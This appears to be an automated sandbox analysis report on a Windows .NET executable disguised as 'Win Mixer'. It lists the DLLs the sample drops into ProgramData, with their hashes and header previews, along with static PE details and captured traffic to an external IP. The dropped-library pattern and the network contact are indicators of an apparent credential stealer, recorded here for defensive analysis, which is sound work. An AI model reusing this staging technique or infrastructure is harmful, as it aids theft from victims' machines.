Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll Download File
Process:	C:\Users\user\Desktop\buIKlB688e.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	334288
Entropy (8bit):	6.807000203861606
Encrypted:	false
SSDEEP:	6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
MD5:	EF2834AC4EE7D6724F255BEAF527E635
SHA1:	5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
SHA-256:	A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
SHA-512:	C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Cu71vDdE5w.exe, Detection: malicious, Browse Filename: 20znh7W3Y1.exe, Detection: malicious, Browse Filename: SZIJ791077 Brazil.xlsx, Detection: malicious, Browse Filename: JAKjm9895D.exe, Detection: malicious, Browse Filename: 9pJXfhJSjO.exe, Detection: malicious, Browse Filename: Xn2MuorsTC.exe, Detection: malicious, Browse Filename: XsgPPVkaMP.exe, Detection: malicious, Browse Filename: fWadL3DSQw.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.MulDropNET.43.8032.exe, Detection: malicious, Browse Filename: DqvtaJLisV.exe, Detection: malicious, Browse Filename: w347KbpZ6t.exe, Detection: malicious, Browse Filename: V5cy4riN4O.exe, Detection: malicious, Browse Filename: sPp0dD63Dt.exe, Detection: malicious, Browse Filename: setup_x86_x64_install.exe, Detection: malicious, Browse Filename: 0goCbw8S8f.exe, Detection: malicious, Browse Filename: otJgx8JkpE.exe, Detection: malicious, Browse Filename: SvmhQnz5E2.exe, Detection: malicious, Browse Filename: Jl7TdlxE2X.exe, Detection: malicious, Browse Filename: 6cSzeDpR8H.exe, Detection: malicious, Browse Filename: ABB98RdRjb.exe, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....b.[.........."!.........f......)........................................p.......s....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll Download File
Process:	C:\Users\user\Desktop\buIKlB688e.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	137168
Entropy (8bit):	6.78390291752429
Encrypted:	false
SSDEEP:	3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
MD5:	8F73C08A9660691143661BF7332C3C27
SHA1:	37FA65DD737C50FDA710FDBDE89E51374D0C204A
SHA-256:	3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
SHA-512:	0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...._.[.........."!.....z...................................................@.......3....@A........................@...t.......,.... ..x....................0..h.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll Download File
Process:	C:\Users\user\Desktop\buIKlB688e.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll Download File
Process:	C:\Users\user\Desktop\buIKlB688e.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1246160
Entropy (8bit):	6.765536416094505
Encrypted:	false
SSDEEP:	24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
MD5:	BFAC4E3C5908856BA17D41EDCD455A51
SHA1:	8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
SHA-256:	E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
SHA-512:	2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L....b.[.........."!................w........................................@............@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll Download File
Process:	C:\Users\user\Desktop\buIKlB688e.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144848
Entropy (8bit):	6.539750563864442
Encrypted:	false
SSDEEP:	3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
MD5:	A2EE53DE9167BF0D6C019303B7CA84E5
SHA1:	2A3C737FA1157E8483815E98B666408A18C0DB42
SHA-256:	43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
SHA-512:	45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\ProgramData\sqlite3.dll Download File
Process:	C:\Users\user\Desktop\buIKlB688e.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	645592
Entropy (8bit):	6.50414583238337
Encrypted:	false
SSDEEP:	12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
MD5:	E477A96C8F2B18D6B5C27BDE49C990BF
SHA1:	E980C9BF41330D1E5BD04556DB4646A0210F7409
SHA-256:	16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
SHA-512:	335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..

C:\ProgramData\vcruntime140.dll Download File
Process:	C:\Users\user\Desktop\buIKlB688e.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\buIKlB688e.exe.log Download File
Process:	C:\Users\user\Desktop\buIKlB688e.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.8363738584751435
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	buIKlB688e.exe
File size:	557056
MD5:	c7ab84a215a60e703e2906f68a1bae13
SHA1:	e1e57a74e28d8016f074da9cda4b68ab04b1737f
SHA256:	dda5d47308c0ebcb2555cda19b4c05a88d633396909456b9ee5fcee42e197724
SHA512:	106b653700a6f6cb9b77738648c71efc1096cf6dea253e49763b5e1e33eb2a29db5a60ae5bfecb9ba5e67dd392b3c6289ec4574219caf89e4a96bc186f097d5e
SSDEEP:	12288:8MkzW+vUdJ8GHOdE+aTi4CgaOJju1+MtPQRtIdSB:8LeXRuEjTiwJjuEPdB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...E=ea..............0..x..........*.... ........@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x48952a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61653D45 [Tue Oct 12 07:46:13 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
fcom dword ptr [edx+00h]
add bl, ah
movsd
add byte ptr [eax], al
pop esp
stc
add byte ptr [eax], al
pop ecx
dec ebp
add dword ptr [eax], eax
push es
mov byte ptr [F7630001h], al
add dword ptr [eax], eax
mov dword ptr [ebp+02h], ecx
add byte ptr [ebp-5Ch], bl
add al, byte ptr [eax]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x894d8	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8a000	0x398	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x87618	0x87800	False	0.920174123616	data	7.84635094677	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x8a000	0x398	0x400	False	0.376953125	data	2.92853751115	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8c000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x8a058	0x33c	data

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2018 - 2021
Assembly Version	4.0.2.0
InternalName	ApartmentSta.exe
FileVersion	4.0.2.0
CompanyName
LegalTrademarks
Comments
ProductName	Win Mixer
ProductVersion	4.0.2.0
FileDescription	Win Mixer
OriginalFilename	ApartmentSta.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2021 12:35:34.315745115 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.343683958 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.343831062 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.345733881 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.371797085 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.373011112 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.373075962 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.373104095 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.373131990 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.373146057 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.373159885 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.373187065 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.373199940 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.373228073 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.373230934 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.373248100 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.373255014 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.373281956 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.373281956 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.373307943 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.373318911 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.373392105 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.373399019 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.399046898 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.399091959 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.399110079 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.399158001 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.399180889 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.399199963 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.399204969 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.399230957 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.399247885 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.399250984 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.399275064 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.399296045 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.399321079 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.399336100 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.399343014 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.399348021 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.399363995 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.399370909 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.399385929 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.399408102 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.399408102 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.399429083 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.399431944 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.399452925 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.399471045 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.399490118 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.399507046 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.399508953 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.399538994 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.399569035 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.425263882 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425308943 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425333977 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425359011 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425383091 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425409079 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425431967 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425453901 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425476074 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425476074 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.425498962 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425518990 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.425523043 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425540924 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.425545931 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425573111 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425599098 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425607920 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.425611973 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.425625086 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425647974 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425673008 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425673962 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.425697088 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425704956 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.425719976 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425728083 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.425741911 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425765038 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425765038 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.425791025 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425795078 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.425816059 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425822020 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.425838947 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425846100 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.425863028 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425868988 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.425888062 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425896883 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.425911903 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425914049 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.425935984 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.425939083 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.425962925 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.425983906 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.425997019 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.426022053 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.426044941 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.426054001 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.426069021 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.426079988 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.426103115 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.426115990 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.426126003 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.426141977 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.426178932 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.426183939 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.426199913 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.426222086 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.426223993 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.426244974 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.426255941 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.426268101 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.426280975 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.426289082 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.426307917 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.426338911 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.452079058 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452120066 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452145100 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452177048 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452202082 CEST	80	49749	195.133.18.140	192.168.2.6
